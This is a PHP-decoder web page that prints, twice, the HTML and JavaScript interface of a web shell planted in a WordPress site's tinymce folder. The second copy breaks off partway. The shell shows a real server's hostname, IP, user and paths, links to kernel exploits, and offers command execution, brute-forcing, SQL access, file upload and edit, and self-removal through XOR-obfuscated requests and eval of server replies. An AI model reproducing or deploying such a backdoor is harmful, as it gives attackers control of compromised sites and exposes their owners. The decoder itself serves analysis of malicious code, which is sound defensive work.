Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'><tit..
Decoded Output download
<? <html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'><title>dfsfkjltyerg</title>
<style>
body{background-color:#444;color:#e1e1e1;}
body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }
table.info{ color:#fff;background-color:#222; }
span,h1,a{ color: #0ef544 !important; }
span{ font-weight: bolder; }
h1{ border-left:5px solid #0ef544;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }
div.content{ padding: 5px;margin-left:5px;background-color:#333; }
a{ text-decoration:none; }
a:hover{ text-decoration:underline; }
.ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }
.bigarea{ width:100%;height:300px; }
input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid #0ef544; font: 9pt Monospace,'Courier New'; }
form{ margin:0px; }
#toolsTbl{ text-align:center; }
.toolsInp{ width: 300px }
.main th{text-align:left;background-color:#5e5e5e;}
.main tr:hover{background-color:#5e5e5e}
.l1{background-color:#444}
.l2{background-color:#333}
pre{font-family:Courier,Monospace;}
</style>
<script>
var c_ = '/home/nathanlatx/www/wp-includes/js/tinymce/utils/';
var a_ = 'FilesMan'
var charset_ = 'Windows-1251';
var p1_ = '';
var p2_ = '';
var p3_ = '';
var d = document;
function encrypt(str,pwd){if(pwd==null||pwd.length<=0){return null;}str=base64_encode(str);pwd=base64_encode(pwd);var enc_chr='';var enc_str='';var i=0;while(i<str.length){for(var j=0;j<pwd.length;j++){enc_chr=str.charCodeAt(i)^pwd.charCodeAt(j);enc_str+=String.fromCharCode(enc_chr);i++;if(i>=str.length)break;}}return base64_encode(enc_str);}
function utf8_encode(argString){var string=(argString+'');var utftext='',start,end,stringl=0;start=end=0;stringl=string.length;for(var n=0;n<stringl;n++){var c1=string.charCodeAt(n);var enc=null;if(c1<128){end++;}else if(c1>127&&c1<2048){enc=String.fromCharCode((c1>>6)|192)+String.fromCharCode((c1&63)|128);}else{enc=String.fromCharCode((c1>>12)|224)+String.fromCharCode(((c1>>6)&63)|128)+String.fromCharCode((c1&63)|128);}if(enc!==null){if(end>start){utftext+=string.slice(start,end);}utftext+=enc;start=end=n+1;}}if(end>start){utftext+=string.slice(start,stringl);}return utftext;}
function base64_encode(data){var b64 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var o1,o2,o3,h1,h2,h3,h4,bits,i=0,ac=0,enc='',tmp_arr=[];if (!data){return data;}data=utf8_encode(data+'');do{o1=data.charCodeAt(i++);o2=data.charCodeAt(i++);o3=data.charCodeAt(i++);bits=o1<<16|o2<<8|o3;h1=bits>>18&0x3f;h2=bits>>12&0x3f;h3=bits>>6&0x3f;h4=bits&0x3f;tmp_arr[ac++]=b64.charAt(h1)+b64.charAt(h2)+b64.charAt(h3)+b64.charAt(h4);}while(i<data.length);enc=tmp_arr.join('');switch (data.length%3){case 1:enc=enc.slice(0,-2)+'==';break;case 2:enc=enc.slice(0,-1)+'=';break;}return enc;}
function set(a,c,p1,p2,p3,charset) {
if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;
if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;
if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;
if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;
d.mf.a.value = encrypt(d.mf.a.value,'23be0e4c9a2e91b330bfeb7d20229e71');
d.mf.c.value = encrypt(d.mf.c.value,'23be0e4c9a2e91b330bfeb7d20229e71');
d.mf.p1.value = encrypt(d.mf.p1.value,'23be0e4c9a2e91b330bfeb7d20229e71');
d.mf.p2.value = encrypt(d.mf.p2.value,'23be0e4c9a2e91b330bfeb7d20229e71');
d.mf.p3.value = encrypt(d.mf.p3.value,'23be0e4c9a2e91b330bfeb7d20229e71');
if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
}
function g(a,c,p1,p2,p3,charset) {
set(a,c,p1,p2,p3,charset);
d.mf.submit();
}
function a(a,c,p1,p2,p3,charset) {
set(a,c,p1,p2,p3,charset);
var params = 'ajax=true';
for(i=0;i<d.mf.elements.length;i++)
params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);
sr('/wp-includes/js/tinymce/utils/file1.php.suspected', params);
}
function sr(url, params) {
if (window.XMLHttpRequest)
req = new XMLHttpRequest();
else if (window.ActiveXObject)
req = new ActiveXObject('Microsoft.XMLHTTP');
if (req) {
req.onreadystatechange = processReqChange;
req.open('POST', url, true);
req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');
req.send(params);
}
}
function processReqChange() {
if( (req.readyState == 4) )
if(req.status == 200) {
var reg = new RegExp("(\d+)([\S\s]*)", 'm');
var arr=reg.exec(req.responseText);
eval(arr[2].substr(0, arr[1]));
} else alert('Request error!');
}
</script>
<head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'>
<form method=post name=mf style='display:none;'>
<input type=hidden name=a>
<input type=hidden name=c>
<input type=hidden name=p1>
<input type=hidden name=p2>
<input type=hidden name=p3>
<input type=hidden name=charset>
</form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux webm075.cluster017.gra.hosting.ovh.net 4.14.119-ovh-vps-grsec-zfs-classid #1 SMP Wed May 15 10:40:34 CEST 2019 x86 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.14.1" target=_blank>[exploit-db.com]</a></nobr><br>149040 ( nathanlatx ) <span>Group:</span> 100 ( users )<br>7.2.15 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2019-06-14 07:28:27<br>1 B <span>Free:</span> B (0%)<br><a href='#' onclick='g("FilesMan","/")'>/</a><a href='#' onclick='g("FilesMan","/home/")'>home/</a><a href='#' onclick='g("FilesMan","/home/nathanlatx/")'>nathanlatx/</a><a href='#' onclick='g("FilesMan","/home/nathanlatx/www/")'>www/</a><a href='#' onclick='g("FilesMan","/home/nathanlatx/www/wp-includes/")'>wp-includes/</a><a href='#' onclick='g("FilesMan","/home/nathanlatx/www/wp-includes/js/")'>js/</a><a href='#' onclick='g("FilesMan","/home/nathanlatx/www/wp-includes/js/tinymce/")'>tinymce/</a><a href='#' onclick='g("FilesMan","/home/nathanlatx/www/wp-includes/js/tinymce/utils/")'>utils/</a> <font color=#25ff00>drwxr-xr-x</font> <a href=# onclick="g('FilesMan','/home/nathanlatx/www/wp-includes/js/tinymce/utils','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" selected>Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br>51.68.235.198<br><span>Client IP:</span><br>Hidden</nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="10%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="10%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="10%">[ <a href="#" onclick="g('FilesMan',null,'','','')">FilesMan</a> ]</th><th width="10%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="10%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="10%">[ <a href="#" onclick="g('SecInfo',null,'','','')">SecInfo</a> ]</th><th width="10%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="10%">[ <a href="#" onclick="g('StringTools',null,'','','')">StringTools</a> ]</th><th width="10%">[ <a href="#" onclick="g('Logout',null,'','','')">Logout</a> ]</th><th width="10%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script><script>
function sa() {
for(i=0;i<d.files.elements.length;i++)
if(d.files.elements[i].type == 'checkbox')
d.files.elements[i].checked = d.files.elements[0].checked;
}
</script>
<table width='100%' class='main' cellspacing='0' cellpadding='2'>
<form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g("FilesMan",null,"s_name_0")'>Name</a></th><th><a href='#' onclick='g("FilesMan",null,"s_size_0")'>Size</a></th><th><a href='#' onclick='g("FilesMan",null,"s_modify_0")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g("FilesMan",null,"s_perms_0")'>Permissions</a></th><th>Actions</th></tr><tr><td><input type=checkbox name="f[]" value="." class=chkbx></td><td><a href=# onclick="g('FilesMan','/home/nathanlatx/www/wp-includes/js/tinymce/utils/.');" ><b>[ . ]</b></a></td><td>dir</td><td>2019-04-26 00:22:55</td><td>nathanlatx/users</td><td><a href=# onclick="g('FilesTools',null,'.','chmod')"><font color=#25ff00>drwxr-xr-x</font></td><td><a href="#" onclick="g('FilesTools',null,'.', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'.', 'touch')">T</a></td></tr><tr class=l1><td><input type=checkbox name="f[]" value=".." class=chkbx></td><td><a href=# onclick="g('FilesMan','/home/nathanlatx/www/wp-includes/js/tinymce/utils/..');" ><b>[ .. ]</b></a></td><td>dir</td><td>2019-04-26 00:22:55</td><td>nathanlatx/users</td><td><a href=# onclick="g('FilesTools',null,'..','chmod')"><font color=#25ff00>drwxr-xr-x</font></td><td><a href="#" onclick="g('FilesTools',null,'..', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'..', 'touch')">T</a></td></tr><tr><td><input type=checkbox name="f[]" value="editable_selects.js" class=chkbx></td><td><a href=# onclick="g('FilesTools',null,'editable_selects.js', 'view')">editable_selects.js</a></td><td>2.08 KB</td><td>2018-12-19 16:09:33</td><td>nathanlatx/users</td><td><a href=# onclick="g('FilesTools',null,'editable_selects.js','chmod')"><font color=#25ff00>-rw-r--r--</font></td><td><a href="#" onclick="g('FilesTools',null,'editable_selects.js', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'editable_selects.js', 'touch')">T</a> <a href="#" onclick="g('FilesTools',null,'editable_selects.js', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'editable_selects.js', 'download')">D</a></td></tr><tr class=l1><td><input type=checkbox name="f[]" value="file1.php.suspected" class=chkbx></td><td><a href=# onclick="g('FilesTools',null,'file1.php.suspected', 'view')">file1.php.suspected</a></td><td>26.55 KB</td><td>2019-04-17 11:29:45</td><td>nathanlatx/users</td><td><a href=# onclick="g('FilesTools',null,'file1.php.suspected','chmod')"><font color=#25ff00>-rw----r--</font></td><td><a href="#" onclick="g('FilesTools',null,'file1.php.suspected', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'file1.php.suspected', 'touch')">T</a> <a href="#" onclick="g('FilesTools',null,'file1.php.suspected', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'file1.php.suspected', 'download')">D</a></td></tr><tr><td><input type=checkbox name="f[]" value="form_utils.js" class=chkbx></td><td><a href=# onclick="g('FilesTools',null,'form_utils.js', 'view')">form_utils.js</a></td><td>5.93 KB</td><td>2018-12-19 16:09:33</td><td>nathanlatx/users</td><td><a href=# onclick="g('FilesTools',null,'form_utils.js','chmod')"><font color=#25ff00>-rw-r--r--</font></td><td><a href="#" onclick="g('FilesTools',null,'form_utils.js', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'form_utils.js', 'touch')">T</a> <a href="#" onclick="g('FilesTools',null,'form_utils.js', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'form_utils.js', 'download')">D</a></td></tr><tr class=l1><td><input type=checkbox name="f[]" value="mctabs.js" class=chkbx></td><td><a href=# onclick="g('FilesTools',null,'mctabs.js', 'view')">mctabs.js</a></td><td>4.06 KB</td><td>2018-12-19 16:09:33</td><td>nathanlatx/users</td><td><a href=# onclick="g('FilesTools',null,'mctabs.js','chmod')"><font color=#25ff00>-rw-r--r--</font></td><td><a href="#" onclick="g('FilesTools',null,'mctabs.js', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'mctabs.js', 'touch')">T</a> <a href="#" onclick="g('FilesTools',null,'mctabs.js', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'mctabs.js', 'download')">D</a></td></tr><tr><td><input type=checkbox name="f[]" value="newsside.php" class=chkbx></td><td><a href=# onclick="g('FilesTools',null,'newsside.php', 'view')">newsside.php</a></td><td>332 B</td><td>2018-12-19 16:09:33</td><td>nathanlatx/users</td><td><a href=# onclick="g('FilesTools',null,'newsside.php','chmod')"><font color=#25ff00>-rw----r--</font></td><td><a href="#" onclick="g('FilesTools',null,'newsside.php', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'newsside.php', 'touch')">T</a> <a href="#" onclick="g('FilesTools',null,'newsside.php', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'newsside.php', 'download')">D</a></td></tr><tr class=l1><td><input type=checkbox name="f[]" value="validate.js" class=chkbx></td><td><a href=# onclick="g('FilesTools',null,'validate.js', 'view')">validate.js</a></td><td>6.31 KB</td><td>2018-12-19 16:09:34</td><td>nathanlatx/users</td><td><a href=# onclick="g('FilesTools',null,'validate.js','chmod')"><font color=#25ff00>-rw-r--r--</font></td><td><a href="#" onclick="g('FilesTools',null,'validate.js', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'validate.js', 'touch')">T</a> <a href="#" onclick="g('FilesTools',null,'validate.js', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'validate.js', 'download')">D</a></td></tr><tr><td colspan=7>
<input type=hidden name=ne value=''>
<input type=hidden name=a value='FilesMan'>
<input type=hidden name=c value='/home/nathanlatx/www/wp-includes/js/tinymce/utils/'>
<input type=hidden name=charset value='Windows-1251'>
<select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option><option value='zip'>Compress (zip)</option><option value='unzip'>Uncompress (zip)</option><option value='tar'>Compress (tar.gz)</option></select> <input type='submit' value='>>'></td></tr></form></table></div>
</div>
<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'>
<tr>
<td><form onsubmit="g(null,this.c.value,'');return false;"><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/home/nathanlatx/www/wp-includes/js/tinymce/utils/'><input type=submit value='>>'></form></td>
<td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
</tr><tr>
<td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color='green'>(Writeable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td>
<td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color='green'>(Writeable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
</tr><tr>
<td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td>
<td><form method='post' ENCTYPE='multipart/form-data'>
<input type=hidden name=a value='FilesMan'>
<input type=hidden name=c value='/home/nathanlatx/www/wp-includes/js/tinymce/utils/'>
<input type=hidden name=p1 value='uploadFile'>
<input type=hidden name=ne value=''>
<input type=hidden name=charset value='Windows-1251'>
<span>Upload file:</span> <font color='green'>(Writeable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td>
</tr></table></div></body></html> ?>Did this file decode correctly?
Original Code
<html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'><title>dfsfkjltyerg</title>
<style>
body{background-color:#444;color:#e1e1e1;}
body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }
table.info{ color:#fff;background-color:#222; }
span,h1,a{ color: #0ef544 !important; }
span{ font-weight: bolder; }
h1{ border-left:5px solid #0ef544;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }
div.content{ padding: 5px;margin-left:5px;background-color:#333; }
a{ text-decoration:none; }
a:hover{ text-decoration:underline; }
.ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }
.bigarea{ width:100%;height:300px; }
input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid #0ef544; font: 9pt Monospace,'Courier New'; }
form{ margin:0px; }
#toolsTbl{ text-align:center; }
.toolsInp{ width: 300px }
.main th{text-align:left;background-color:#5e5e5e;}
.main tr:hover{background-color:#5e5e5e}
.l1{background-color:#444}
.l2{background-color:#333}
pre{font-family:Courier,Monospace;}
</style>
<script>
var c_ = '/home/nathanlatx/www/wp-includes/js/tinymce/utils/';
var a_ = 'FilesMan'
var charset_ = 'Windows-1251';
var p1_ = '';
var p2_ = '';
var p3_ = '';
var d = document;
function encrypt(str,pwd){if(pwd==null||pwd.length<=0){return null;}str=base64_encode(str);pwd=base64_encode(pwd);var enc_chr='';var enc_str='';var i=0;while(i<str.length){for(var j=0;j<pwd.length;j++){enc_chr=str.charCodeAt(i)^pwd.charCodeAt(j);enc_str+=String.fromCharCode(enc_chr);i++;if(i>=str.length)break;}}return base64_encode(enc_str);}
function utf8_encode(argString){var string=(argString+'');var utftext='',start,end,stringl=0;start=end=0;stringl=string.length;for(var n=0;n<stringl;n++){var c1=string.charCodeAt(n);var enc=null;if(c1<128){end++;}else if(c1>127&&c1<2048){enc=String.fromCharCode((c1>>6)|192)+String.fromCharCode((c1&63)|128);}else{enc=String.fromCharCode((c1>>12)|224)+String.fromCharCode(((c1>>6)&63)|128)+String.fromCharCode((c1&63)|128);}if(enc!==null){if(end>start){utftext+=string.slice(start,end);}utftext+=enc;start=end=n+1;}}if(end>start){utftext+=string.slice(start,stringl);}return utftext;}
function base64_encode(data){var b64 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var o1,o2,o3,h1,h2,h3,h4,bits,i=0,ac=0,enc='',tmp_arr=[];if (!data){return data;}data=utf8_encode(data+'');do{o1=data.charCodeAt(i++);o2=data.charCodeAt(i++);o3=data.charCodeAt(i++);bits=o1<<16|o2<<8|o3;h1=bits>>18&0x3f;h2=bits>>12&0x3f;h3=bits>>6&0x3f;h4=bits&0x3f;tmp_arr[ac++]=b64.charAt(h1)+b64.charAt(h2)+b64.charAt(h3)+b64.charAt(h4);}while(i<data.length);enc=tmp_arr.join('');switch (data.length%3){case 1:enc=enc.slice(0,-2)+'==';break;case 2:enc=enc.slice(0,-1)+'=';break;}return enc;}
function set(a,c,p1,p2,p3,charset) {
if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;
if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;
if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;
if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;
d.mf.a.value = encrypt(d.mf.a.value,'23be0e4c9a2e91b330bfeb7d20229e71');
d.mf.c.value = encrypt(d.mf.c.value,'23be0e4c9a2e91b330bfeb7d20229e71');
d.mf.p1.value = encrypt(d.mf.p1.value,'23be0e4c9a2e91b330bfeb7d20229e71');
d.mf.p2.value = encrypt(d.mf.p2.value,'23be0e4c9a2e91b330bfeb7d20229e71');
d.mf.p3.value = encrypt(d.mf.p3.value,'23be0e4c9a2e91b330bfeb7d20229e71');
if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
}
function g(a,c,p1,p2,p3,charset) {
set(a,c,p1,p2,p3,charset);
d.mf.submit();
}
function a(a,c,p1,p2,p3,charset) {
set(a,c,p1,p2,p3,charset);
var params = 'ajax=true';
for(i=0;i<d.mf.elements.length;i++)
params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);
sr('/wp-includes/js/tinymce/utils/file1.php.suspected', params);
}
function sr(url, params) {
if (window.XMLHttpRequest)
req = new XMLHttpRequest();
else if (window.ActiveXObject)
req = new ActiveXObject('Microsoft.XMLHTTP');
if (req) {
req.onreadystatechange = processReqChange;
req.open('POST', url, true);
req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');
req.send(params);
}
}
function processReqChange() {
if( (req.readyState == 4) )
if(req.status == 200) {
var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm');
var arr=reg.exec(req.responseText);
eval(arr[2].substr(0, arr[1]));
} else alert('Request error!');
}
</script>
<head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'>
<form method=post name=mf style='display:none;'>
<input type=hidden name=a>
<input type=hidden name=c>
<input type=hidden name=p1>
<input type=hidden name=p2>
<input type=hidden name=p3>
<input type=hidden name=charset>
</form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux webm075.cluster017.gra.hosting.ovh.net 4.14.119-ovh-vps-grsec-zfs-classid #1 SMP Wed May 15 10:40:34 CEST 2019 x86 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.14.1" target=_blank>[exploit-db.com]</a></nobr><br>149040 ( nathanlatx ) <span>Group:</span> 100 ( users )<br>7.2.15 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2019-06-14 07:28:27<br>1 B <span>Free:</span> B (0%)<br><a href='#' onclick='g("FilesMan","/")'>/</a><a href='#' onclick='g("FilesMan","/home/")'>home/</a><a href='#' onclick='g("FilesMan","/home/nathanlatx/")'>nathanlatx/</a><a href='#' onclick='g("FilesMan","/home/nathanlatx/www/")'>www/</a><a href='#' onclick='g("FilesMan","/home/nathanlatx/www/wp-includes/")'>wp-includes/</a><a href='#' onclick='g("FilesMan","/home/nathanlatx/www/wp-includes/js/")'>js/</a><a href='#' onclick='g("FilesMan","/home/nathanlatx/www/wp-includes/js/tinymce/")'>tinymce/</a><a href='#' onclick='g("FilesMan","/home/nathanlatx/www/wp-includes/js/tinymce/utils/")'>utils/</a> <font color=#25ff00>drwxr-xr-x</font> <a href=# onclick="g('FilesMan','/home/nathanlatx/www/wp-includes/js/tinymce/utils','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" selected>Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br>51.68.235.198<br><span>Client IP:</span><br>Hidden</nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="10%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="10%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="10%">[ <a href="#" onclick="g('FilesMan',null,'','','')">FilesMan</a> ]</th><th width="10%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="10%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="10%">[ <a href="#" onclick="g('SecInfo',null,'','','')">SecInfo</a> ]</th><th width="10%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="10%">[ <a href="#" onclick="g('StringTools',null,'','','')">StringTools</a> ]</th><th width="10%">[ <a href="#" onclick="g('Logout',null,'','','')">Logout</a> ]</th><th width="10%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script><script>
function sa() {
for(i=0;i<d.files.elements.length;i++)
if(d.files.elements[i].type == 'checkbox')
d.files.elements[i].checked = d.files.elements[0].checked;
}
</script>
<table width='100%' class='main' cellspacing='0' cellpadding='2'>
<form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g("FilesMan",null,"s_name_0")'>Name</a></th><th><a href='#' onclick='g("FilesMan",null,"s_size_0")'>Size</a></th><th><a href='#' onclick='g("FilesMan",null,"s_modify_0")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g("FilesMan",null,"s_perms_0")'>Permissions</a></th><th>Actions</th></tr><tr><td><input type=checkbox name="f[]" value="." class=chkbx></td><td><a href=# onclick="g('FilesMan','/home/nathanlatx/www/wp-includes/js/tinymce/utils/.');" ><b>[ . ]</b></a></td><td>dir</td><td>2019-04-26 00:22:55</td><td>nathanlatx/users</td><td><a href=# onclick="g('FilesTools',null,'.','chmod')"><font color=#25ff00>drwxr-xr-x</font></td><td><a href="#" onclick="g('FilesTools',null,'.', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'.', 'touch')">T</a></td></tr><tr class=l1><td><input type=checkbox name="f[]" value=".." class=chkbx></td><td><a href=# onclick="g('FilesMan','/home/nathanlatx/www/wp-includes/js/tinymce/utils/..');" ><b>[ .. ]</b></a></td><td>dir</td><td>2019-04-26 00:22:55</td><td>nathanlatx/users</td><td><a href=# onclick="g('FilesTools',null,'..','chmod')"><font color=#25ff00>drwxr-xr-x</font></td><td><a href="#" onclick="g('FilesTools',null,'..', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'..', 'touch')">T</a></td></tr><tr><td><input type=checkbox name="f[]" value="editable_selects.js" class=chkbx></td><td><a href=# onclick="g('FilesTools',null,'editable_selects.js', 'view')">editable_selects.js</a></td><td>2.08 KB</td><td>2018-12-19 16:09:33</td><td>nathanlatx/users</td><td><a href=# onclick="g('FilesTools',null,'editable_selects.js','chmod')"><font color=#25ff00>-rw-r--r--</font></td><td><a href="#" onclick="g('FilesTools',null,'editable_selects.js', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'editable_selects.js', 'touch')">T</a> <a href="#" onclick="g('FilesTools',null,'editable_selects.js', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'editable_selects.js', 'download')">D</a></td></tr><tr class=l1><td><input type=checkbox name="f[]" value="file1.php.suspected" class=chkbx></td><td><a href=# onclick="g('FilesTools',null,'file1.php.suspected', 'view')">file1.php.suspected</a></td><td>26.55 KB</td><td>2019-04-17 11:29:45</td><td>nathanlatx/users</td><td><a href=# onclick="g('FilesTools',null,'file1.php.suspected','chmod')"><font color=#25ff00>-rw----r--</font></td><td><a href="#" onclick="g('FilesTools',null,'file1.php.suspected', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'file1.php.suspected', 'touch')">T</a> <a href="#" onclick="g('FilesTools',null,'file1.php.suspected', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'file1.php.suspected', 'download')">D</a></td></tr><tr><td><input type=checkbox name="f[]" value="form_utils.js" class=chkbx></td><td><a href=# onclick="g('FilesTools',null,'form_utils.js', 'view')">form_utils.js</a></td><td>5.93 KB</td><td>2018-12-19 16:09:33</td><td>nathanlatx/users</td><td><a href=# onclick="g('FilesTools',null,'form_utils.js','chmod')"><font color=#25ff00>-rw-r--r--</font></td><td><a href="#" onclick="g('FilesTools',null,'form_utils.js', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'form_utils.js', 'touch')">T</a> <a href="#" onclick="g('FilesTools',null,'form_utils.js', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'form_utils.js', 'download')">D</a></td></tr><tr class=l1><td><input type=checkbox name="f[]" value="mctabs.js" class=chkbx></td><td><a href=# onclick="g('FilesTools',null,'mctabs.js', 'view')">mctabs.js</a></td><td>4.06 KB</td><td>2018-12-19 16:09:33</td><td>nathanlatx/users</td><td><a href=# onclick="g('FilesTools',null,'mctabs.js','chmod')"><font color=#25ff00>-rw-r--r--</font></td><td><a href="#" onclick="g('FilesTools',null,'mctabs.js', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'mctabs.js', 'touch')">T</a> <a href="#" onclick="g('FilesTools',null,'mctabs.js', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'mctabs.js', 'download')">D</a></td></tr><tr><td><input type=checkbox name="f[]" value="newsside.php" class=chkbx></td><td><a href=# onclick="g('FilesTools',null,'newsside.php', 'view')">newsside.php</a></td><td>332 B</td><td>2018-12-19 16:09:33</td><td>nathanlatx/users</td><td><a href=# onclick="g('FilesTools',null,'newsside.php','chmod')"><font color=#25ff00>-rw----r--</font></td><td><a href="#" onclick="g('FilesTools',null,'newsside.php', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'newsside.php', 'touch')">T</a> <a href="#" onclick="g('FilesTools',null,'newsside.php', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'newsside.php', 'download')">D</a></td></tr><tr class=l1><td><input type=checkbox name="f[]" value="validate.js" class=chkbx></td><td><a href=# onclick="g('FilesTools',null,'validate.js', 'view')">validate.js</a></td><td>6.31 KB</td><td>2018-12-19 16:09:34</td><td>nathanlatx/users</td><td><a href=# onclick="g('FilesTools',null,'validate.js','chmod')"><font color=#25ff00>-rw-r--r--</font></td><td><a href="#" onclick="g('FilesTools',null,'validate.js', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'validate.js', 'touch')">T</a> <a href="#" 